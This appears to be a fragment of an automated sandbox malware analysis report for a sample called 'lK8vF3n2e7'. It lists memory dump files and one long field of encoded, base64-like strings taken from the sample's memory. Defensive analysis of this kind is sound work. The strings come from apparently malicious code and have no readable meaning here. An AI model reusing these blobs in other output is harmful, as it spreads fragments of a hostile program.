                                                                              • RYTUKc/+E/6Z8CU5/qg9cE/8Q3Nc8zByJMWCu1vn10Gc5posH6y/BYkJWEhjdo/+6+zGBhG29IobE5ZmNZAjQTBi6eJPLCEh8OCtQfZL3h23oopp/tRzjYQNV/uFp8YTU+SacvcnnRwIYtJGQL7HDgNKHhpBig5JABe/AUf2hyk5O5wXahRDZf58732U80VoR9Niwc/7M7mZu/l6T7O2gZD3idGtpBFTdSjuCtzJ7LE82P3K5X8QJqfMvSLZtnfc7Lsn, xrefs: 0040421B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$_strlen$Message
                                                                              • String ID: +Goq6Dh98ajIsrqBI0zNDycQA7BWpJsUZG2mbA3Q5sIAdDcDU8AAJtsPu+0O8Q+TsQ4OmQb2RwfyIf2qfffsaEA0gRrw9zhN16MUVLp3fosOkByjAWb3cAjbBRqeqofVWPmINRuKs3JnfvLMZ8XUjPvMIksT85T7C47ob7hCz+qgdeVIX1pgwGPqHiCCsfkwpsMHYCEYGID8rYpcItBzGuZZ87T6+7DlCJZH9JJDR3a17cA+sTB/OPgqrIfvD9jZd3mO$,D$/HLD0E7DeJhcfZxzzdc1TjvkREihxXOPrqEAOHqShh/2jfWU4ykWs3d4MJrJWYrkdApaBiiJLY8r/q9Zb11g6pxdORpsPVk+TkG+bOo+Wq3AifsqzYMDPH9i5aRDOvqcnby8tzTriXd5yPnnhxdpEyE+3ANB64Oudud2ghmSsceRvi5JLQvhnXgT/VnVKXW1nZKTolBm1A/nI3TARvTL1cvYH8Aupl0SOFg9odlDpCd+6hvzzdy2bR9PUJtpT5IZSvhf$0HfQeAvSuZ5S7yg3VcS7KqFTbeb1mhFNw6QhGUUzhjo+pgNKMoY6Lsp37v932yQOKgILS6QvjP7scNreYGEMsDlGPbxXkSf3b7g/MQZ6OeSmH45t56TCkp02xbXJ6qbxReAzKNNxKQxGUf0W9avTggQ++6rh19LT2ws2yn1yBt530eW0HSk7Vi364NSdZxfiE3ju7Ara0S4OqgyOrx005XZ12ETJRm7ocBhRrBRA6VNQdB9pe8qz3Tfa5xFQI8wIzETg$0JNVIEVrnJ6IG05zq1BZ30SSIshQhXwoTMQHL2zhELhvRtS9uB1r8kXv/BcrbOZZHxTFhbFCKy0lscM1e9uE6eWwzMYmhbFzwtQ4/47VPFApjFjYsvjjdg7qVgoxCn6K786njh3sy57yEGE/RsA92AUJuKH44Z46yu77YF7LVvgIh5sPv/VLqRFYBqTT2inhGZdlu/exqAiBGSu3Bob+6HDSdZxwMKLeJPPMcMW0GXP4/hQWmiuOoGizC9raw0jgtZab$0U/iRR4U/JDVe6mYxaCOceXek2lseLkPuU2l4l8wCpxxkPCD2u9g9FDgKrI8AEiwImAmyiu3TqGV2fBYypUswmgiRJz2e7VllN+9BgygYNKm9MRKlcpU7zB3NHNsjoHoskfFP69T/VIcTYJ5t2nUvRa3fgSfz0XgdUKaENH32XU9RXzncy1NJzPebZqoQb3o5NPgZawt7uGoOU6iOjnX8he6YzqNpmePPYzxPMoB9tcCnu3MrIuh10U8C1/JX0bY1e2Z$13cnQOs10BHlWWPCOoWg0Dy6CjtdmbhUjturyujugbds3ZukQs/O2IcLWSMxTDF1wR+JUvq4/O3tufIKtribF7v6UJlmxeGVAaljTsLNBfcYVbITRH9Rx3Tqrnz9sZ6cj4b1Mf4otqVbKBzUOyd2lMWH9fGkDgJKEce/oWPUAsaCR08h49nCElvJ10AiP7X06YrVemPMioLcq3HwWWbLiFt5ZVlcMU6x6/cgDMioHSSmgASU8jrIJUAs5wNG0iusKahU$1H9plKqM5eAsipr8KO/x1/G2aLBvASP+gRInrIcsCqEgJe7K+JRQI3N+DYEzO7M8ImzaK8zMwvVw9y75YP47qIKNcJ6NFb9aKylDC/2Rd7kuSGZzACUlC4JJxSy1TXdcVmW+QgEsQXZjwS0otN/SSRNtRbzTImIghzjhxb4duTLnd41y+A1zPHkTw0ogjK7tD51rm9ZM+VrYdFtvGZjOpzE/mw/Py7hYFFbhS1Wo1jyC8olg0L8PC9B9fbhgVKww7QqV$1Qu4JtOtyleiEaXm6QsR+eG3w3vBeus2qllwd2GYA5enGgBZkT++AUSV4nQlYGyk9ZFVMOE4ar7XnOzRzVOHWMLg1guBfu9tDpjkeRAlT2q8fwr+St/ryMnZQaFodNwof/4NVeaOk5j53neF2wo9Hj6vdzhZmlaStkp0qE/R7GoGc7ODEU4Xl0sAQfg2tvkTKSDsHOmR13SYiKjo6ZUm7cLbFJUYHopR+IPdN4vrgaH9r/Ljibj37NnLl35S7ITdoOvu$1Z9uEoFL9Qa8yn34WPN9Btj/dAU9YVSRqq1lbPA/am+J6z89ELdQ1Pq47l8NyiFplDyUjvHYUjGDO7M4yyZiuIymHi0lBP2EvaKN1flEVmHjGKxc1ksALWaSpqLVmRqK6053YmHAgJ9qS7lgQDLBUZeKX0mxOEXwJxEaf4sky9MQVwxx1EVSnBs2+xu2JUzkpa3XDE/3AYgs25FKV2uRoJ0oHI7ve4VrMVV72ZIMtYEENrRILcvFvb+2N7r5UdX0XiNb$24QP1XmEN161eAeeDzA3ZyRPpNRV7j06tBl4XvW0ylHYhFzmGRW/H7o2jredWB33nuZkaHH6alnEo/hbuwExMo4gHB8ABc2WWRaxHJBbiNCAhj5fnsg58sepr+uBAh1oESQhGw8pHMBZiXu0SHTSDGXN8PRJlVb3fBf7eJJF5CdAqtvANL15ncSyajbFSVrMWxf3zZEmGkwhAvMY1he7+6WmVH8YEEIOZA3T6Dp+mQy2G78WZq5tfww5xNyCfgNVN7n7$2NhoTb6xGEzFSqBn1wY/EWXS5ceQwsTTkUZekrNcGHkjl8KiWZJdvfy+OgXEjeU/TTa9gBouWVT0y5N9aeJ4ffTjh7nrAVi8otRO2ly/HRvxZPiXd8O0LB6yKNM7prJJYV+D8YLrNPIRa12Pnqytxpt5AHq4avXnaLKn4KfLO5EBM+2U4KNenyrUNzE+wr0mqgw9Z+nfqnifkhv3vbfl3FO+RgG4R3L/5Ywa2T+rzKhvhu8+/VqD20QJa8srA5PeTGFX$2x9bnO0nD28ZFY8VBvfLaHwiuDQvgV4kIPs9aN5KrvXMvF8c9po/tAzxNZ8ZeqtJFAMLh6eNhwFQ6XhLxApHlgnwn42FnVqeqt1BPSIueygmV8DnCo5iOZ1hiFdfvg9Cc3PxDbEyL+3bpYbLkaqNS0SCV2MVCEvFADOCt5b1ImssiTW65wTBY1VKGYi7pwPlpdLty+BE9ESi8wUWyOvJiOm5Y4fYMK7kOJdP4qelmE+h+9nFkMIAre/BsCPY4teqxVN1$3U/DMSa6Iy9hZyF0qCoNANt1xgdl9DZy18pO/x9GMQ1yoRv7kU+yqtj7pClaxTJPbj4dZ3sSf8uj9CnqbDa8uRddXwT75758wPj0hBsbuy+1iijGR28SqldRcQgYvqiwMDsATGiOEDyK/7pZRkgYoRVUrxrzOXFTWskuXw//L59NYS6Lz6d7Jlwwz1O52FvyFTLPvRT93jD8T8z8s9whtnGiV0CTst+WNef0W6WPo5vujR8Jq72gtTjjwaUdCUXATILB$3gvZDwZS4mth8W20aWKL8bINQAVHFGMYyOL1FoQK5RCUZsFsYbKJwD8wlEfJDT3m0KRLCjM0Za5RE8Nob9jRy2AV6eCFEGADc47DlSDCWilQGUIZdzfgloZ6q51KY4qorDg3ygbyP+6VdE6FNcuR+NcVI4BSdcVbhdorjsK6XPjuBXqqs7FFAsfbEpHb/yb9G12XmVcx50yhf1+UVvpIoTBkBbfB8WoRW6Jau7j6eESGMKJbfw3nZkQws4Pl5+OpDWmt$3wZRX98PuWFLpeen33t/juTI+EaeQW1aBe/M1I2BQe9REagaO684YEa7uYWE+diUT2Z1l4iiERgMob34XnDTaE+EfG9GjA9dQ+dwHWKM5viy/PvZe/uZjtJWvm5y90yBNvw2dGh2JZdtnB3yRQ1NdMUeM3fmrOiEZvsL2eCcJ/GRk1vBQJIHJaG/XDkCWaWn6FpENCNLpsMoq+cmEAOB+yQ0blZmW9qqaFkZuIUwIvqjeD95u3lPk0dxRYHl6q+bJNlr$45tETdAO0ynDgytbjAzE806ide21EHGj8+Jy/Du9/M/cOUqvk5subtGrHaDFqeaVqK1cuCamhOaQrl1HC+0aii6HSBjsq+Rsgw0iWTqmDqDBFSslCVoqS7DK2owsiXLIX2j82u5f+TjAZ+McPW37hy/hgWYIMhEHGX/32ZW0X3zFTdG5tPmEJAH1SHpq70tejij8Z4ayaO4idLRZhGYb9Y8+PiIQCJvqEdIw5YlbuhXMSaYdHw5hmTy5yEQ/Nd+tIk4r$5DKh+hCRUhf2O0tkYVJVlXXKtByEJLMtJ/TTQhd36e7le04Q5RUuqzqVs8wnElpDj7vGmwirO1ilsrrwiLtSW+VbxfNi3FjB5j6kS6RnCRvh3kMMmBl35itsYUoHmStJZbAwwlPfdBUT0iCTIm3x5Vfn41vMUg0h1af2H15uiAkf5D21QJLcIEekTVPT738N4TKFGtJLmYJQZaqGVAdXtZvmJ0aTx6n/kTfEPltQaVN2B+8MzEIOQLNgK9aRDszso5Sf$6ELzisIKyQBB3w9T8P2z5pj15jrShLqv8LNBf50/REMh$6TJGAAE8RB9nlgPUEJ/CFl5RLH3JSZ/HpdRTPBII2ITn7lj2ntheuFpWMVNh4Wjzm7YEpWbAUS774eYJ70M5WHfbn9FfUPmsGVE6ysVPccR5RXDuqGAN13nQkaNh2vAo/VN89txJeTcpLk3VfdNAESk2ujRvHeN5lmE3/lcNPwdgZqjoayMzr6vRdPs1WhE7zG2k31943hu26A20PWAdo1qGgNfqeoVjNwVUfW0k48yTU8RLXHxp+H4AsIlqooh07n43$7FY1E+9JVigE1n+lpgexo2MG0nbRcJW9s9Tj5JlmdGqDbnHOsBL18jUS9UwVrh7UGBjGOMT7CnP7gE1sJmf0QsQZNBLUhJ812Jwg/akcrPNaUpYu6FIBvpUT+WS7nz4DUj23/dezUhZvracjlq49ZbnlXbuPbrdmieFPF9Jzt0WZRvToH5n20P3QtuDH4Z5trdojythjEW9ubRkPI2pktdF6Ga86ap1K8wPkvIFbLmyLkPmHp7fGXvT4vQMOgDEZpr+e$7TPYFMNnuIKzPkKUvxOxsr0ZsODKKfzk+uhkvf42hKU9apSq81Dez48DzNbz/Y/3pLKM7VAqXA0n/9wO5wqs9DdXrIL7ycBR1uKLmPuzQHYZx0UV+CcQZsvIQ67ZPPLxBHGak26OBj1AF2mXSUVY1pc2jkx0H4YKEn0E0LwpgAR9Q6Vc3z9h7s7Exf9Kk97fga7O6dBKaQmafiMHm91skFoBURTuub8IAiSj3hiIJtPZZxcvyNWqqb39H51Vdxal3MTC$7hTKVH4YjOoDxAe4vAbdUfWP498nxzf6PKa+Eu56P5+vBspRtqdBDYXqT3tfI0xG7CGKi2eOYoOqAkhRKUMuqDnfn0S7FRFa9hCAhIfKpl+OYcVklUN4a1R11KEa5JTZYBC02SQHKTLaS4JSBiQtraWTOFXgEyq6nPK/KvWH8PHFg2PYF6he6kzCEHDX7VZAg0q58Hieq/uOO8zOSj+SW/EGZYQ33I10RMn3z26mWUlmhIr9ujNOxmjeFwCnePxzSYt/$7iYfKeCVnIdKZxBqC5S6/aEZfNvAWLIbpqm+Q/4fXYvoVQ+FqLlXPSP+1C/wUxbNkSsnmsg1MZZpCnOGe9MTdYHHUukJpc57jo8SKxGaOwRmTM4czn6SvEquZmYHoCADY4klK1m3fiayjgQCIFsANeVQDRGeD9fXUTp5p4f3tY0YizSR+GVjaB/Mn+eFsSNxv9DHrbgIWCoXZ7iKUP++c4G8OKNRt0zTjin/i+zXpF10EwDBgwzgkweVt4m6BasC0isL$8BFf5eikWvoTYCB2mxe5eqiilHUxrygRKl9uH9+pOJtYBhe61PF9Bg/rehhN+QKC0C80vIeIBdN0K44AqJgWIt18HO0/Z7dHmYUbUEWQjJIYSNecUJ6HsGBR8m22CxUMoNyKXUxAMqYC9iIfaseGKdNNqst7f55Asjn6ncvZbNtDdZCW38BSuM6NngWJcgWqOTyxOOHjFgRnnyefnlxLU5Jy2LRYGfTBxv5yBiYq7AYoWLJgaTv2IJwkx6G6RANhvWpu$8fZ2SIycqCn5P3fJIvnhg5ciK4S6jz7mvXrqWz5AAPTaPDGbFDpGe/ga40OSX1V4QHH2XRCE5Sagw2CNxA4qqmTP+M08bvve1+8sJpIhIMambzeGMfKTAWWrky5qDvccCmgYmyKMFeMHos1vO+Nw7z0kx+bR6jku7J65JFQqJ8lYEsfdWYfu3R5MYLR/3rMNGs0IbNQlXQgKgks2qB48u+QD8NgI4FOdxg1q0jNHSuvaxZBTmzvJrGWjoRFA/OKfpi2m$8gEWjcteL2/BwmxTNq4QBP2w5SY3bVSXxqbuiejtILVoVxW9niczuzgqmYS+r7iW54JhsZhBrk98qJ77oqA2Qd61asF1iQOzl2C1aUlQcN/t57Duljf8k9KmV7JxONnY9XMNy9utvR/FtsYWNypWcezc3en7PKjIyA+C5I4KNfCD8/0LarqnybYsT21t2qGpQDdpxBBwjmrAXajmi8nmCPtRIYRD21UkwgGtj0SP9JEb44DmIyYPwUeQDNlpSNSJcNrT$8nKs/3iUerUMFRaxVzYMiubBwBQTHx2ldo1aaAD10abMqibVvNDGotThwnhSd8RtyYKdEHQcyPw3icJ7gpD2FslAONxeQPfCOL3uOQSZWDGXxAlDRDl8TchzsYYrf8G09ZwYU0eon1Ll8+XJ7sPzCSHAF4OOXVjHdZ5E5UUjqT1Utf7m6hyC8l4OZkN/ltIIWZlLroR497Q8MRs8DF1CSygzpid7N1i7LDaBR/Vh8A3+YadumGTg1cTVF01IrXy7U3bX$8ny6jPkt5n5FEEXBxl0HL8RKoTQcDz/4W5DBuZpA+TI75pU4KYu7pLwocZZzkkCvFySsNAATuHuJH1mz4X8SBtZDDKE0Zr3J3UHeB4c2GC1byYDjNlxYK17T09CuaqWtXkrEMdmq0G/AXWXX4Eucg19vE6JchC4To1Wcpwh4P7+xsAVrUgbEm3TNwDFp3EiLOP7E28+uK08GrSMwwFNlLN+WaYUo3nI26sodmpHVSnhG8p41VYNtd8xjbfoDQfmkIMtb$93ERN8FlYYVW+JEBwZtVAJQ1xWQIoXL7/I+pYc6DnvxvYxeY5kWZj9ejSbCDctKJ6qYhHWFP0PHfvASpaTnOwA8cK1r+4A0vPc13Rz9m9q7nXy/9r3etjO45AI0e/B/EXeNRrr4uI7XA+lvycQzRJNZWQu29y9SFCEVVQwC9mlsq+GZlxtlblilUCDoZo1jMYCXA7s09dmU0ThrfC16Xi1k/GGN5iGs8wOhD1BA4lEhm0xDzbyfuCAoD1/ibApI9fMPt$93HwZuDaFVoWiLi9WkMfVlo6LpDnQg052S6NUMTFmBH64MdRVnmMzlr6l6CMs+nddFnuwLRo6ip/fee7MmibV78AWKFnmflEcuAdqiIENqSZuYYSj2YBUkrvH6fmHxUVP2rhu+OdOmi2EW0EFZBJH90ph8foGOUwolOjBvJiwc+Fgrh+Y7nVZxVM2Fji/aiYbR9n31RvKfX+ZPc+dGr+jT9iBwzhapdYKRy5oOFrHVl599yEEL2GWWAsaE0zbpqjjDol$99i64/K7/+u1jPL/30BETt0xAY0tnASeT94aqwIgFSMINnKod1gUvXZZ2UrgSL88LZwYlwe4Mh6wuxGcqUCNp7V8Y58xRfCr9n1V9fdxeKUGA9Pf7GOvHnULYUIOVQMnOpT9XNVS63qP/yUC42Xa7rSCQvS79mCftKoNuRYoWCCPtNgve2ZtnRxTQWE1cMLP26ONJn3jT7T2cTYclnbcG/V2l+KKH4JQ3P1j0QF245b6jrhaA7x3xs/oEENwV9EYG2uF$9dXfVOAbCykgbWPZ+uUrUnPnT3Sf+X2XrwOnZMU6SZ6bX7VzRp4kTr9HD5kPavylJxi9fGdM8U9PFuwWfyTaIc7feG/GwlTy07SH2rJ76hUqF/s/HdUWce5PFVJlbY0rLaa7etRxCHv7AsadM1qhwJDjE6kvrT7ygPO1LAKI9fzGWpcTa4lREBzI5uhq7EwwnZOqzCfxDiJrprMZbUIhqrc6QULw1YKGmFLSDnxIv3Wm0CsrJjSC75mE4uk7xb75J06H$9eWcxOrVZ9Qc8M9p3lqcr8x7yjdR74tLeDVbCH2td5zjO09XlZRj1uUvV7Fa7LyzMsxm/3fodF+cXg7qmL9TvMdjqrueK3z9V2XVoxeEBC/RLuhmRkUugZjOO4coKto2Ck4NKyRzkVweHSMOIp7Scc8nCnUc1NaE8ubMtiYgmxA5rEN9IyAD28AQxVgdlTrCo2mxaaUpZKsfD7cfE75cfSnSP5VkCanjYLYvcnzKl0tzT4ENokV0GNrI0NWjJyQtCFOg$9oec36ryFEuyx+Y/f5tW119Elos8G+rHA/9tnb1mkZsQ4QCcQWxjEgUfrO5vhOP4UlJjMc8FvV2BrPDcu6bwOnMd3sRQALPGNxZgwSclspzjVZ0hbvKtO7jORU7zbgOinLTOCuyBfkyMklfNUeTO8/PRmUuy+8dnRmNdPolNwqIUoYosH0BRva828OBqmZ+dwXftzjGkzWcdEKSnMVW+8oHQhG9Z8LDWwHid0KnuW5CZec5t3QFQ8JfD9zSe56TkNdzz$A1amgh6xjpCntjhnFw0heKnm9LrOfVrB2DIOq/47EV5r1il/n7tQVbxrGGs6ZD79/dqTcexZZjx/gcpebBh1PyWk+Vs75sYVNr8qumiuykzOpzgXpivSfIOU2nvap+sroMqa0AQlbdj+dahkXc72u3xTnRuJrCH3e41XZL/VCwaZJ1O6dzRQCwSa0ug6WRUHz+ucuobV3NLxyLSuDbHI5CvaJKX6CDhES0ooprgC2hJNe33v6vgW/4NtPRMMZRkwxh9C$B4fdFtsvfMIGY5lzdXDD4kFF5mSi9T2Fv3KgQo1NnWXqaEdvZ7mdyw0A63AYarxDvQbe/X+LY0CtRQAO5PU6ldrZE2TKCG8L57elrywwW/+YwOmii1nONG/q1dKwjfav2BlyG/By4AEqnAF+cgsqfZ8wNSAgQJ1fz6JQVdu6sU+6Uf2M42WnRMXolfN0hH23NkHt2NBK4FP0+gNHagimJvp4uNeDnmEM9qowcK/UvAxQsIbREc1/4EdqjYfxaUVz/33c$BtGEUcQSWoE3eGyaiUS9Xjva8pgntSpiRL2JKvfeHtUSKi98VekL4158fpDKpaOUaU1BZsD37m1+cPi990KYMGgKb186xa3Kckm31+pKHLLVELd3a02G4R/k0dSQj0TNtH285PaXj4E8xyJG6V4yRcNhdwe9Oizwc0A8b6mK3Hs+y8E4mimp8IRO/e83fYyexPgLXwOFDYPXer920QZafpWv+fhCCadtZKejLOQijgE3qE01i811XKSZvn0yRaF5R9Ol$BykFbluxe8JdhrKEtkvLD8KGqV7qx5kD5/ovFy9jBPpvUv9o8udDINYOipP0xZfUi+QLFisGWg14rdnXJAFaA+4Gm5V11Nn6wwUMXg9kV+XxEPBDJznELVmZelUwvS0xWq7TzGrx3ucd+WRtxE7V9LcmQoN69xnmnUgBgRduClOHzXHt31l3rrmGRSd7L//FmbmGEeRnKPZPgL31CsHvqDVw7OEvxXDzwY6zKiIkwABYBHUCEnEFBsOiIPBCfgZ/49QR$C7/Gv0SXegoWOJWLlXY+R4kTHY1FkvKIMCk1mUha7Sn8+Gni2hGWIACl5PH5m6KIO1dGiP3Z5ncSzg8Wzh1XRkrX2jgzrFNUU1JeziR2tOU38vNfgjX9YPZwUtKhsdUfEy8kdFseUjqxPLi3skzjm/42Lejc/C+qERQfsxaM6i2XrTZQW9HpWf56/I69Oi8XpuvuuyN1FfKEyjxgPgeL6S0FKcIhWtqxe/liDdw2qY6cMbfLxxaUAPNLeAwPBPBsq6yb$CcopkWbkNkQ6/Uen4mXNVUu8Tb6Cufn0qUwjQmqAa7/66UuQhh2tMlwZyVYRSbHzceeV53GEhQrsqcHr6ZiYbUGEXFGZKUagQGmcb0r67+CYSGVmnSfDksrVRDa4hkJgg5DhOLW52TM+DFAf/TzL/lWUrBD1SaahZQWDbF24CnhO77+Du+piPXkfj1hP0JbwuElvpxDJs3ejVU6rntHo6n0zeOcZkxp9XEMNg+5uyMqfWJeRkFLWqSTPeJd61emhrl86$D0JvKgo9vAtQbTP90vCcjS5tCz/m1YYjJ/KcTjt05mtgpgJgJKIgG1PgHiZVE2JnCp5LhaUyGjnkjM0qIypJU3YiSFSBn2bcqYlJPydjZYeznpQn79H8Vqo8BcVqsjUfmFztAJStotkmJMT4WxYIoc/MwRWQYC1u9nG7j9FzrV2lVPpBCWAwYnTb9ia5b4SvpZbDdTFyhRsr0MfTFchfeXAHTHO6lQYtHsHDaOydcroqr1DiHgjdpcMIe4FqeNZA0fkN$DVS7RqTPF5/AdHrXxnJVBGRZuMzC4r6+tiE3LHY2ILkWazR3xJqrBgeTKqf0pVK+OwzXM26MCMJsja+Yfduu6TCypj0tfHkn7c92hyUEdQpWAHNIiugOsYdKDztsa9pg9JUf/cneguWpnWryjDJpQdXggukiVSgK38QDmf+FnLvgoO3iT3UPGadCYvOyy2LEGDtE8qrNhlyQLxFI8sSD1sl7Y+qxvcDPc9gYUpfs6Zz/dO7l1WkPo8dmaHK2vglAR/Df$DWUiiCG7e4hWjLXDYj47L9BWHTKjRz15jbE/KqScpSt+DAbeBpTwzaMEN/I2s4LDYi9CNYqMnw8yLT1P25SaNTIpiFA7zVUHDiRj7YnfT9YSsex8+Px49s00H+v+jimCaOmE5JfBU/oXT6wfoQxp9R5VxscGwmgIfIOX8K6LEkdMSVmeavtkm/pvGQKneVQmcloSldIvflUE6LRIMYSPCi+EVRxkDarmZTxKgkwjjpGLEAP4Fo4RRFbM97hpA6RRZZbT$DXjY4cvECPmYYrznDR/xyqpfSAfzV1BkV8K+eO5FeJtX6uDiICkRaW0f8XhEO4EThtn4sru9qjKKjSNmQqdC3b5Ft8iaJSwQQPohTrfl7HqlUbkGXJOuYVk+eJf7HIYerFYzRx+B/g3HW/qAodRfsGoxGBm/oO98xD+ysvoz0gq9NvRt0Sf9pLg2k6MPOEyLyGB0v7aqJsv1cujbiCp8Z4DEQSUe6wcnq3So3HADNnB8hDyJEV/dBBEf4avZeacHFSS2$E4aXdlyDax6W5yGUiK+zzQuWwVX3LQqecci4Bees2GBp2ZfSbW1N/xyzbDoL5kOQMKqS6lAS2/WhX9uuPN5/wbyYciuvEhs8ykVZDbTGjBH91qRxKvGQ5GYH3N9xEy/V2mEBZ62Z02jtwgYTBKhCC0h0lehcWwrv9Qjn2XVFR5GMc/+duWl4uL7VE3z/4aSrX3sdAXeY75/vn7/r/aDDHEJfkkMt1sZprUyeoJcSBqisgyi6dXzPHz5Ec9N7ohNSzkTK$EL3aA+qaqlolp4EEz/DkiL/frzTWAm+/pPEVCcqbJ384/1AtyoDNIU0S1hhR6VGBlIrwqwdeWm/TYFuuYFyloLu7lyamVq9S81KoORDCGOO1eo8nURn0IbX10YKM0Slv4fAeETi5ea3oHiKaq0AwHHYwrS2BiLKHvO+9XbVI4FjXsvGG7rs6L1Bemw/PhRfygTY28xHTcYOejKoAOuILtawkUtPLvW324OhkaQt+vnyI2LQUfcF2fYLE+gE9Z/EIQrmY$ETONff4RNXRQH956KUhBwtJERcfiRxQLyNTkig0WX5f9zFr6dz64m5gSNUMdG9BNRErSlLSWeCE0JE+XbfTbWd332OT+WkHTZ1MVrXLUDsQJdSRPG4tuFS/bxCzNonY3ezZne4I7nVqhQrXMtdSKTASyofgyXIXHCKq3J06EHvK0jqe5SJzDXZChzHcWITXY6/IdUNtw2PsiTewTEAiDEhBRjDfPHHXAr2R4vegfEzTtYkxl1GEm/UyBu7fxjpfGDDZ8$EvMS0MPSiZIS4H3s8f9/MVfwP+g+Uupukk9UYabMQ12QNFFId9xuoko8Xfw4vb0vb0JlK1KUdyxCedl/K5pEMZvcgnJ3BwZy9MhYwYpTIJjBoTJRb6inwleVPk09msPaZVSlOl3nixkp0ScUIPCmm3awa2x0jzHTsYBbk6wxujlxeXvyriqJHc8/TE59aqkkgyaFMiBELX5dGwp116ehgZvUMSrfgC7GZT+eb9sqGKdNuBd00ZXZUFjjEjN6XMdP66WP$Finish!!!$Fox3JUh79vZHPIEBQ+2iAwdVdKXsN9PpWswHGVWtQyo3aapvp5nVFyKOE56X5Awdmd1do9j6/qnRj7APi0+DBbUVOP3M7a6mnSorj4wFeI2u+K7tgEQ9zuPyeoDZETZIvk9kdYgHY3mfHrLjhPrfeuqfoMfXAjBQTqv+V3QQNSNM10FLJ388j/eP2CP1l/0jIGkPXb6uUDWQlCHduC0I/oVek0bcOBeCC2ndsWLVzmb8fHEXWN+eP0zbu3bIeJzFJsyb$Ftri0OgVklCuj26rCyY/KPNTIQvVewvZTHBaO6Lwa3/Tbj0Crb6ezChueWhK45sliWOfhA97H2e12hriq7roF4T9uXkfza3i5F2f6YTmRInaSBnPqAslBjuzoyJ6IsVas8dTdHzAo/izLIBaffIzel6JvtLtmvfv5XWiXD5vqklMFxIf/onG8DUj8Xl3xkMONG8Jj6P6dhyr5MwplDqLvgzHc1DEDFKaLZa1uRkXtiv3CKCA3N3B6Wyb0bXcDygep2CL$FwOKsYtSddTjTa/hLN0zrRMdd2S+nm2ddo2JFZBD9Fk1BepfE97RTWOpzrGuyZv0Rc2JEymqbHECQqIX8Cx0Ot3VAx0d9HBnQvkMWlDyMdXvf1AHCHpT065Hrtd/4JeuKQiO9RoCUo3vmUKrcD/gH5aqb5p1IEakSpLtGvUYnQsi3PT8s6/m4J8qMXctM70MMKrEbEtfjp5ASKiioONhXvg1837vbjRlTyBxo2n0GqRDoEnvuf1CSM+EV0tD7Tz0sLx2$GrizpuyN8jxBnyePMRRx43Lw0bMulOHqH69kUjqKJ31zXelSu/BfBDdEl13lqzwRil6Yf1H40pOIrz6taL6njkn8T57cPgrqGWhSN0ltTE0a3ax+1R7NuGA//dyDrQzMvsyCo2UeV4iGzbvszQhi9X54AVzU6chDHq3udx80reVJxcLWscZacuj85n6D4rc/zV4T+7zHUxAjsqLiEtsMoPCwRzRJFC6d6Jd6pqPWeqQNr+mZ8iX4JbAxzyvtNrCpQ9zY$HHq+GaRYRVCgoQNNr+qZZqHmhHFiDkb4ITPLWUNvPOgqcVjTLA+rRmSq8JK4INAtUuCcC0ogaq9P/mR30el0o3pvml9jPsO3e0Os2o1pOw7wa1/umerF6yjPCY7yG16i5Y+TrVVCp+myH1EDLIx7uVOznkFONGqsO/iDJlnbVtVmZZIX62iEfDt+TxOMVstvR3K+0eFH2JduRQPoRi8p4nBKwlgvzAQNs00+wOAZfpQrS85v3EQgYZfF/aFHTWjVEdSj$HQQVXy+V+GBqSWxcdsUc8mlPUrjmjI6zmjxXsiyOefKwT8TqmDKJUKsN16RFXcl0Tza6FHBTmuddkOilcDdrt9DRZTMVvF+Ui8K5M6qacW5Nnp5FJWhT3I7q+NL6FWgmU8ieid6K/Z4Fsntom9q9zZnL0nCQ7ZoxYLfzIRuf02xVwSYkiWxIzx9NPPaYX2s62UJXCaBya0L+/Q0/lq4D1bwCinbRyk3rVfT9svwK8W5syQZtG5KaZWYt/nlZ1siR73vP$Hf8ScKMXL7g38xVXWQCgCb6MHE2QSI+hwBfwXHrTnY/DqLB556IZsyRdF1esoibjneikCYClcGEVM3nBX+3y0bf1UdKQQt7k+AX4uvYA+7o6hxpJpEQHULgP4cCBcOGaIT+kDq1ZHQSl44q/jAJD4aE5nH4j/Id5Y2OEcD/v76fr6wRTuwgi1C+KsQc/cYg3cnEchGmgUVR6VG900PZz9tWfaNDro2WztNJNLf++obo5fZDeT1FAI5hnYyzKmrizc0Ql$I8oKGytdP622n9WmGxbgmPhIfDzm3srNwnaDwLHaPuaIqKpKHJ+haXU4Lc/uxCygu3VYhfJXxbxfrqdeVt4kZAyaSSnVvXW0zfVXghGFS0LXjfmFDY7skNksCX66umEr8XOIxu8DVf/SLy0Y+CoBz14kYiA8CK3s/p/RPI/LVlsM47LNREhppES52ibX8zLNfqvGlsGDuvFvpXwN8FkJRxlJhksfuNqWAaun7Qgh0yyvLtn88xpWIzGLITTamiabjmuL$IKZAbiOomcpNQvba9/2vWSR2k9nHX/bu7DMphhVaCFZnqpIaNpf4byZ9n6K6jEazsr4s4ZQT5TLzGQjbXB1mtTIljPE5KSV8l+ytxaCr3sHwFEtdGc5SYfBwP1wSHbz3oOsjqTISYBZWZ6/+K0O0Awtjutmhbb91mWnZKycuzmXGlJDM5/YqeOvqnNya+7peHP56C5VvUtMtus4y1gHA1vu0hJrNxXoLkai/Pjwl7R8Aucc4ESkGEtHcY6M6uGH3daOy$IY0E8uu3EK6/AiRBA2gCzmw81p1n0FKMbH/OsJt0IQbpKYMl1M7O4P6Fm2PcVUIEfjf0mNHOlacOZRPVVb3teIhnNbIBYOacWky0h3oPBX1kiLnbgx72uGiEGNCb7hstIHqpQyJDokHfcHh7O7CemJG3Gx2Z0rvhzk+cqxx/FOGcmxOw0Ik1l55oL5JH2kATMerWPoYd4dYmvQlgjQrKSNyCdLycVAmWKWMYS8D2BmtvsilbkJwqJP0rztJP7vMRYpRm$IYkpa0mEyM0FDLurQgUsDkT9N6tdz3WLVJyxURCr6zJ2bPVViHPf8Vbsu6Ok0tFggCEWspfYJ5XLqlf0kLSvymMMsoZKPiBPQ6AyTEU/EBWx60D8JezDueJnA5AQPxK/LU8Gok5KwcSJLleK2+bIP